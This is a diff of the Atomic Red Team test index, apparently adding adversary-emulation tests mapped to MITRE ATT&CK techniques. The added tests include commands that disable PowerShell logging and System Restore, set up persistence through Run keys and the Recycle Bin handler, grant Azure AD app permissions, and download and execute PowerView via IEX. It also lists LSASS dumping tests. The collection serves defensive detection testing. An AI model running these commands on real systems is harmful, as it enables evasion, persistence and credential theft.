+        ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCANetwork /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCANetwork /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Windows HideSCAPower Group Policy Feature
+      auto_generated_guid: 8d85a5d8-702f-436f-bc78-fcd9119496fc
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to remove the battery icon Group Policy. \nTake note that
+        some Group Policy changes might require a restart to take effect.\nSee how
+        ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCAPower /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCAPower /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Windows HideSCAVolume Group Policy Feature
+      auto_generated_guid: 7f037590-b4c6-4f13-b3cc-e424c5ab8ade
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to remove the volume icon Group Policy. \nTake note that some
+        Group Policy changes might require a restart to take effect..\nSee how ransomware
+        abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCAVolume /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCAVolume /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Windows Modify Show Compress Color And Info Tip Registry
+      auto_generated_guid: 795d3248-0394-4d4d-8e86-4e8df2a2693f
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to show compress color and show tips feature. \nSee how hermeticwiper
+        uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f
+          reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f
+        cleanup_command: |
+          reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
+          reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: Windows Powershell Logging Disabled
+      auto_generated_guid: 95b25212-91a7-42ff-9613-124aca6845a8
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution
+        see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f
+          reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f
+          reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f
+          reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f
+        cleanup_command: |
+          reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /f >nul 2>&1
+          reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1
+          reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /f >nul 2>&1
+          reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
         name: command_prompt
         elevation_required: true
   T1601:
@@ -37635,6 +38283,34 @@ defense-evasion:
         command: "#{dspath} -S #{txt_payload} \n"
         name: powershell
         elevation_required: false
+    - name: Load Arbitrary DLL via Wuauclt (Windows Update Client)
+      auto_generated_guid: 49fbd548-49e9-4bb7-94a6-3769613912b8
+      description: "This test uses Wuauclt to load an arbitrary DLL. Upon execution
+        with the default inputs, calculator.exe will be launched. \nSee https://dtm.uk/wuauclt/\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        arbitrary_dll:
+          description: Path of DLL to be loaded
+          type: String
+          default: PathToAtomicsFolder\T1218\bin\calc.dll
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'DLL to load must exist on disk as specified location (#{arbitrary_dll})
+
+'
+        prereq_command: 'if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{arbitrary_dll}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}"
+      executor:
+        command: 'wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer
+
+'
+        cleanup_command: taskkill /f /im calculator.exe > nul 2>&1
+        name: command_prompt
   T1216:
     technique:
       id: attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe
@@ -41037,6 +41713,88 @@ persistence:
           $($subscriptions.Name)\"\n"
         name: powershell
         elevation_required: false
+    - name: AzureAD - adding permission to application
+      auto_generated_guid: 94ea9cc3-81f9-4111-8dde-3fb54f36af4b
+      description: |
+        The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor.
+        You can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application.
+        The DirectoryRecommendations.Read.All permissions have been selected as the default
+
+        The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD.
+
+        Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs.
+        You can also take a look at the materials:
+        https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/
+        https://github.com/reprise99/Sentinel-Queries
+        https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766
+        https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: String
+          default: jonh@contoso.com
+        password:
+          description: Azure AD password
+          type: String
+          default: p4sswd
+        application_name:
+          description: Name of the targed application
+          type: String
+          default: test_app
+        application_permission:
+          description: Permission from Microsoft Graph Resource API that will be add
+            to application
+          type: String
+          default: DirectoryRecommendations.Read.All
+      dependencies:
+      - description: 'AzureAD module must be installed.
+
+'
+        prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+      executor:
+        command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String
+          \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName
+          System.Management.Automation.PSCredential -ArgumentList \"#{username}\",
+          $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication
+          -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal
+          -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication
+          | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service
+          Principal of Microsoft Graph Resource API \n$graphSP =  Get-AzureADServicePrincipal
+          -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize
+          RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess
+          = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId
+          = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set
+          Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission
+          = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess
+          = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type
+          = \"Role\"\n$resourceAccess.Id = $reqPermission.Id    \n#Add required app
+          permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host
+          \"App permission $permission not found in the Graph Resource API\" -ForegroundColor
+          Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object
+          System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set
+          permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId
+          -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal =
+          Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment
+          -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId
+          -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n"
+        cleanup_command: |
+          Import-Module -Name AzureAD
+          $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+          Connect-AzureAD -Credential $Credential
+
+          $aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
+          Remove-AzureADApplication -ObjectId $aadApplication.ObjectId
+        name: powershell
+        elevation_required: false
   T1547.014:
     technique:
       external_references:
@@ -42459,7 +43217,25 @@ persistence:
       - 'Kernel: Kernel Module Load'
       - 'Driver: Driver Load'
       - 'Process: OS API Execution'
-    atomic_tests: []
+      identifier: T1547
+    atomic_tests:
+    - name: Add a driver
+      auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785
+      description: 'Install a driver via pnputil.exe lolbin
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        driver_inf:
+          description: A built-in, already installed windows driver inf
+          type: Path
+          default: C:\Windows\INF\usbstor.inf
+      executor:
+        command: 'pnputil.exe /add-driver "#{driver_inf}"
+
+'
+        name: command_prompt
   T1037:
     technique:
       id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334
@@ -48752,6 +49528,44 @@ persistence:
           Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore
         name: powershell
         elevation_required: true
+    - name: Add persistance via Recycle bin
+      auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f
+      description: |
+        Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
+        User have to clic on the recycle bin to lauch the payload (here calc)
+      supported_platforms:
+      - windows
+      executor:
+        command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command"
+          /ve /d "calc.exe" /f
+        cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open"
+          /f
+        name: command_prompt
+    - name: SystemBC Malware-as-a-Service Registry
+      auto_generated_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891
+      description: |
+        This Atomic will create a registry key called socks5_powershell for persistance access
+        https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
+      supported_platforms:
+      - windows
+      input_arguments:
+        reg_key_value:
+          description: Thing to Run
+          type: Path
+          default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File
+        reg_key_path:
+          description: Path to registry key to update
+          type: Path
+          default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
+      executor:
+        command: |
+          $RunKey = "#{reg_key_path}"
+          Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
+        cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell"
+          -Force -ErrorAction Ignore
+
+'
+        name: powershell
   T1505.001:
     technique:
       external_references:
@@ -53003,6 +53817,26 @@ impact:
 '
         name: command_prompt
         elevation_required: true
+    - name: Disable System Restore Through Registry
+      auto_generated_guid: 66e647d1-8741-4e43-b7c1-334760c2047f
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to disable system restore on the computer. \nSee how remcos
+        RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
+          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
+          reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
+          reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
+        cleanup_command: |
+          reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /f >nul 2>&1
+          reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /f >nul 2>&1
+          reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /f >nul 2>&1
+          reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
   T1491.001:
     technique:
       external_references:
@@ -54966,6 +55800,31 @@ discovery:
           -Server #{domain}
 
 '
+    - name: Get-DomainUser with PowerView
+      auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2
+      description: 'Utilizing PowerView, run Get-DomainUser to identify the domain
+        users. Upon execution, Users within the domain will be listed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
+        name: powershell
+    - name: Enumerate Active Directory Users with ADSISearcher
+      auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
+      description: |
+        The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
+        Upon successful execution a listing of users will output with their paths in AD.
+        Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: ([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
   T1069.002:
     technique:
       external_references:
@@ -55159,6 +56018,97 @@ discovery:
       executor:
         command: "#{adfind_path} -f (objectcategory=group)\n"
         name: command_prompt
+    - name: Enumerate Active Directory Groups with Get-AdGroup
+      auto_generated_guid: 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+      description: |
+        The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
+        Upon successful execution a listing of groups will output with their paths in AD.
+        Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: 'Get-AdGroup -Filter *
+
+'
+    - name: Enumerate Active Directory Groups with ADSISearcher
+      auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
+      description: |
+        The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
+        Upon successful execution a listing of groups will output with their paths in AD.
+        Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
+
+'
+    - name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+      auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+      description: |
+        When successful, accounts that do not require kerberos pre-auth will be returned.
+        Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Computer must be domain joined.
+
+'
+        prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
+          {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host Joining this computer to a domain must be
+          done manually.
+
+'
+      - description: 'Requires the Active Directory module for powershell to be installed.
+
+'
+        prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit
+          0} else {exit 1}
+
+'
+        get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
+
+'
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'Get-ADUser -Filter ''useraccountcontrol -band 4194304'' -Properties
+          useraccountcontrol | Format-Table name
+
+'
+    - name: Get-DomainGroupMember with PowerView
+      auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145
+      description: 'Utilizing PowerView, run Get-DomainGroupMember to identify domain
+        users. Upon execution, progress and info about groups within the domain being
+        scanned will be displayed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
+        name: powershell
+    - name: Get-DomainGroup with PowerView
+      auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230
+      description: 'Utilizing PowerView, run Get-DomainGroup to identify the domain
+        groups. Upon execution, Groups within the domain will be listed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
+        name: powershell
   T1482:
     technique:
       external_references:
@@ -55581,6 +56531,34 @@ discovery:
           find . -type f -name ".*"
         cleanup_command: 'rm #{output_file}'
         name: sh
+    - name: Simulating MAZE Directory Enumeration
+      auto_generated_guid: c6c34f61-1c3e-40fb-8a58-d017d88286d8
+      description: "This test emulates MAZE ransomware's ability to enumerate directories
+        using Powershell. \nUpon successful execution, this test will output the directory
+        enumeration results to a specified file, as well as display them in the active
+        window. \nSee https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        File_to_output:
+          description: File to output results to
+          type: String
+          default: "$env:temp\\T1083Test5.txt"
+      executor:
+        command: "$folderarray = @(\"Desktop\", \"Downloads\", \"Documents\", \"AppData/Local\",
+          \"AppData/Roaming\")\nGet-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue
+          | Out-File -append #{File_to_output}\nGet-ChildItem -Path $env:programfiles
+          -erroraction silentlycontinue | Out-File -append #{File_to_output}\nGet-ChildItem
+          -Path \"${env:ProgramFiles(x86)}\" -erroraction silentlycontinue | Out-File
+          -append #{File_to_output}\n$UsersFolder = \"$env:homedrive\\Users\\\"\nforeach
+          ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue)
+          \n{\nforeach ($secondarydirectory in $folderarray)\n {Get-ChildItem -Path
+          \"$UsersFolder/$directory/$secondarydirectory\" -ErrorAction SilentlyContinue
+          | Out-File -append #{File_to_output}}\n}\ncat #{File_to_output}\n"
+        cleanup_command: 'remove-item #{File_to_output} -ErrorAction SilentlyContinue
+
+'
+        name: powershell
   T1016.001:
     technique:
       external_references:
@@ -56728,6 +57706,32 @@ discovery:
       executor:
         command: pwpolicy getaccountpolicies
         name: bash
+    - name: Get-DomainPolicy with PowerView
+      auto_generated_guid: 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+      description: 'Utilizing PowerView, run Get-DomainPolicy to return the default
+        domain policy or the domain controller policy for the current domain or a
+        specified domain/domain controller.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
+        name: powershell
+    - name: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+      auto_generated_guid: b2698b33-984c-4a1c-93bb-e4ba72a0babb
+      description: |
+        The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
+        Upon successful execution a listing of the policy implemented will display.
+        Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: get-addefaultdomainpasswordpolicy
   T1120:
     technique:
       created: '2017-05-31T21:31:28.471Z'
@@ -56913,6 +57917,42 @@ discovery:
       executor:
         command: 'tasklist
 
+'
+        name: command_prompt
+    - name: Process Discovery - Get-Process
+      auto_generated_guid: 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34
+      description: "Utilize Get-Process PowerShell cmdlet to identify processes.\n\nUpon
+        successful execution, powershell.exe will execute Get-Process to list processes.
+        Output will be via stdout. \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'Get-Process
+
+'
+        name: powershell
+    - name: Process Discovery - get-wmiObject
+      auto_generated_guid: b51239b4-0129-474f-a2b4-70f855b9f2c2
+      description: "Utilize get-wmiObject PowerShell cmdlet to identify processes.\n\nUpon
+        successful execution, powershell.exe will execute get-wmiObject to list processes.
+        Output will be via stdout. \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'get-wmiObject -class Win32_Process
+
+'
+        name: powershell
+    - name: Process Discovery - wmic process
+      auto_generated_guid: 640cbf6d-659b-498b-ba53-f6dd1a1cc02c
+      description: "Utilize windows management instrumentation to identify processes.\n\nUpon
+        successful execution, WMIC will execute process to list processes. Output
+        will be via stdout. \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'wmic process get /format:list
+
 '
         name: command_prompt
   T1012:
@@ -57400,6 +58440,60 @@ discovery:
             Write-Host $Computer}
         name: powershell
         elevation_required: false
+    - name: Enumerate Active Directory Computers with Get-AdComputer
+      auto_generated_guid: 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+      description: |
+        The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
+        Upon successful execution a listing of Computers will output with their paths in AD.
+        Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'Get-AdComputer -Filter *
+
+'
+    - name: Enumerate Active Directory Computers with ADSISearcher
+      auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+      description: |
+        The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
+        Upon successful execution a listing of computers will output with their paths in AD.
+        Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+
+'
+    - name: Get-DomainController with PowerView
+      auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4
+      description: 'Utilizing PowerView, run Get-DomainController to identify the
+        Domain Controller. Upon execution, information about the domain controller
+        within the domain will be displayed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
+        name: powershell
+    - name: Get-wmiobject to Enumerate Domain Controllers
+      auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+      description: |
+        The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
+        Upon successful execution a listing of Systems from AD will output with their paths.
+        Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: get-wmiobject -class ds_computer -namespace root\directory\ldap
   T1518.001:
     technique:
       id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384
@@ -66508,14 +67602,11 @@ execution:
       - description: Sample script must exist on disk at specified location (#{vbscript})
         prereq_command: 'if (Test-Path #{vbscript}) {exit 0} else {exit 1} '
         get_prereq_command: |-
-          Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "$env:TEMP\sys_info.vbs"
           New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
-          Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
+          Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
       executor:
         command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
-        cleanup_command: |-
-          Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
-          Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
+        cleanup_command: Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
         name: powershell
     - name: Encoded VBS code execution
       auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
@@ -66718,6 +67809,45 @@ execution:
         command: "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file}
           & type #{output_file}\n"
         name: command_prompt
+    - name: Simulate BlackByte Ransomware Print Bombing
+      auto_generated_guid: 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
+      description: "This test attempts to open a file a specified number of times
+        in Wordpad, then prints the contents. \nIt is designed to mimic BlackByte
+        ransomware's print bombing technique, where tree.dll, which contains the ransom
+        note, is opened in Wordpad 75 times and then printed. \nSee https://redcanary.com/blog/blackbyte-ransomware/.
+        \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_to_print:
+          description: File to be opened/printed by Wordpad.
+          type: String
+          default: "$env:temp\\T1059_003note.txt"
+        max_to_print:
+          description: The maximum number of Wordpad windows the test will open/print.
+          type: String
+          default: 75
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'File to print must exist on disk at specified location (#{file_to_print})
+
+'
+        prereq_command: 'if (test-path "#{file_to_print}"){exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'new-item #{file_to_print} -value "This file has been
+          created by T1059.003 Test 4" -Force | Out-Null
+
+'
+      executor:
+        command: 'cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe
+          /p #{file_to_print}" | out-null
+
+'
+        cleanup_command: 'stop-process -name wordpad -force -erroraction silentlycontinue
+
+'
+        name: powershell
   T1047:
     technique:
       id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055

atomics/T1003.001/T1003.001.md

@@ -26,101 +26,34 @@ The following SSPs can be used to access credentials:
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Windows Credential Editor](#atomic-test-1---windows-credential-editor)
+- [Atomic Test #1 - Dump LSASS.exe Memory using ProcDump](#atomic-test-1---dump-lsassexe-memory-using-procdump)
 
-- [Atomic Test #2 - Dump LSASS.exe Memory using ProcDump](#atomic-test-2---dump-lsassexe-memory-using-procdump)
+- [Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-2---dump-lsassexe-memory-using-comsvcsdll)
 
-- [Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-3---dump-lsassexe-memory-using-comsvcsdll)
